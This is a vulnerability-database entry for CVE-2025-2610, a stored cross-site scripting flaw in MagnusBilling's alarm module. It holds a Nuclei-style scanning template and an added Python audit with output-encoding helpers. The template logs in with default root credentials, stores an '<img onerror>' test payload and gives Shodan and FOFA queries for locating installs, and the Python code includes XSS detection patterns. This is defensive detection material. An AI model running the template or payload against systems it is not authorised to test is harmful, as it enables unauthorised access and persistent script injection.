| Title | Published | Reporter |
|---|---|---|
| CVE-2025-2610 | 21 Mar 2025 23:20 | circl |
| MagnusBilling Security Vulnerability | 21 Mar 2025 00:00 | cnnvd |
| CVE-2025-2610 | 21 Mar 2025 22:35 | cve |
| CVE-2025-2610 MagnusBilling Stored Cross-Site Scripting in Alarm Module | 21 Mar 2025 22:35 | cvelist |
| EUVD-2025-7201 | 3 Oct 2025 20:07 | euvd |
| CVE-2025-2610 | 21 Mar 2025 23:15 | nvd |
| PT-2025-12458 | 21 Mar 2025 00:00 | ptsecurity |
| CVE-2025-2610 | 23 Mar 2025 23:14 | redhatcve |
| VulnCheck KEV: CVE-2025-2610 | 21 Mar 2025 00:00 | vulncheck_kev |
| CVE-2025-2610 MagnusBilling Stored Cross-Site Scripting in Alarm Module | 21 Mar 2025 22:35 | vulnrichment |
```yaml
id: CVE-2025-2610

info:
  name: MagnusBilling Alarm Module - Cross-Site Scripting
  author: DhiyaneshDK
  severity: high
  description: |
    Improper neutralization of input during web page generation vulnerability in MagnusSolution MagnusBilling (Alarm Module modules) allows authenticated stored cross-site scripting. This vulnerability is associated with program files protected/components/MagnusLog.Php. This issue affects MagnusBilling through 7.3.0.
  impact: |
    Authenticated attackers can inject malicious HTML and JavaScript through the alarm module that persists and executes when other administrators view alarm configurations, potentially leading to session hijacking and privilege escalation.
  remediation: |
    Upgrade to MagnusBilling version 7.3.1 or later, which properly sanitizes input in the alarm module.
  reference:
    - https://vulncheck.com/advisories/magnusbilling-logs-xss
    - https://chocapikk.com/posts/2025/magnusbilling/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-2610
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N
    cvss-score: 7.6
    cve-id: CVE-2025-2610
    cwe-id: CWE-79
    epss-score: 0.00896
    epss-percentile: 0.55104
    cpe: cpe:2.3:a:magnussolution:magnusbilling:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: magnussolution
    product: magnusbilling
    shodan-query: http.html:"magnusbilling"
    fofa-query: body="magnusbilling"
  tags: cve,cve2025,mbilling,xss,magnusbilling,authenticated,vkev,vuln

flow: http(1) && http(2) && http(3) && http(4)

variables:
  username: "root"
  password: "9F4CA770B638615AC5C3E0D2DA16B77C80C2F2C6" # magnus
  email: "{{randstr}}@{{rand_base(5)}}.com"

http:
  # Step 1: authenticate with the configured credentials
  - raw:
      - |
        POST /mbilling/index.php/authentication/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        user={{username}}&password={{password}}&key=

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "success")'
        condition: and
        internal: true

  # Step 2: confirm the session is established
  - raw:
      - |
        GET /mbilling/index.php/authentication/check?_dc= HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "id_agent")'
        condition: and
        internal: true

  # Step 3: store a test payload in the alarm "message" field
  - raw:
      - |
        POST /mbilling/index.php/alarm/save?_dc= HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded;

        rows={"id":0,"id_plan":0,"type":1,"amount":1,"condition":1,"status":1,"email":"{{email}}","period":3600,"creationdate":null,"subject":"test","message":"<img src=x onerror=alert(document.domain)>"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Operation was successful")'
        condition: and
        internal: true

  # Step 4: read the alarms back and check the payload is returned unencoded
  - raw:
      - |
        GET /mbilling/index.php/alarm/read?_dc=&page=1&start=0&limit=25 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "<img src=x onerror=alert(document.domain)>", "idPlanname")'
        condition: and
# digest: 4a0a0047304502204e8f7b172f77d2c162de4c8aee6597110d02626d78ec782c2b5d513ef71715a3022100fb801b5a3d84870658e4d44115aba8504aeffc64b9d3efea4a2f1342e69c6dc5:922c64590222798bb761d5b6d8e72950
```
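The template above only tells you whether the alarm endpoint echoes markup back; after upgrading, a defender also wants to find alarms that were already saved with markup, and to see what output encoding of the `message` field looks like. The following Python is an added example, not code from the Vulners record, the template author or the MagnusBilling project. The JSON layout, field names and sample rows are constructed to mirror the `alarm/save` request in the template and are assumptions, as are the function names.

```python
"""Audit stored alarm rows for HTML/JS markup and show the output encoding
that neutralises it (added example; constructed sample data)."""
import html
import json
import re

# Patterns that indicate active content in a field that should hold plain text
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")
EVENT_HANDLER_RE = re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)
SCRIPT_SCHEME_RE = re.compile(r"javascript\s*:", re.IGNORECASE)

# Free-text fields an administrator's browser would display
FREE_TEXT_FIELDS = ("subject", "message", "email")

# Constructed sample resembling an alarm/read JSON response (assumed layout);
# row 2 carries the same payload the template stores in step 3
SAMPLE_RESPONSE = json.dumps({
    "success": True,
    "rows": [
        {"id": 1, "id_plan": 0, "idPlanname": "default", "subject": "Low credit",
         "message": "Balance below threshold", "email": "ops@example.invalid"},
        {"id": 2, "id_plan": 0, "idPlanname": "default", "subject": "test",
         "message": "<img src=x onerror=alert(document.domain)>",
         "email": "abc@xyz.example"},
    ],
})


def find_markup_in_alarms(response_body: str) -> list[dict]:
    """Return one finding per row/field whose value looks like markup or script."""
    findings = []
    rows = json.loads(response_body).get("rows", [])
    for row in rows:
        for field in FREE_TEXT_FIELDS:
            value = str(row.get(field, ""))
            reasons = []
            if TAG_RE.search(value):
                reasons.append("html-tag")
            if EVENT_HANDLER_RE.search(value):
                reasons.append("event-handler")
            if SCRIPT_SCHEME_RE.search(value):
                reasons.append("javascript-scheme")
            if reasons:
                findings.append({"id": row.get("id"), "field": field, "reasons": reasons})
    return findings


def encode_for_html(value: str) -> str:
    """Encode for an HTML element/attribute context: the browser shows the
    text instead of parsing it, which is the neutralisation CWE-79 requires."""
    return html.escape(value, quote=True)


def render_row_safe(row: dict) -> str:
    """Render the fields a grid would show, encoding each value at the point of output."""
    cells = "".join(
        f"<td>{encode_for_html(str(row.get(f, '')))}</td>" for f in ("subject", "message")
    )
    return f'<tr data-id="{int(row.get("id", 0))}">{cells}</tr>'


if __name__ == "__main__":
    for finding in find_markup_in_alarms(SAMPLE_RESPONSE):
        print("stored markup:", finding)
    for row in json.loads(SAMPLE_RESPONSE)["rows"]:
        print(render_row_safe(row))
```

Run against a real `alarm/read` response body (captured with the administrator's own session) the audit lists rows that need cleaning; the encoding helper is the shape of fix the remediation line refers to, applied wherever the stored field reaches HTML.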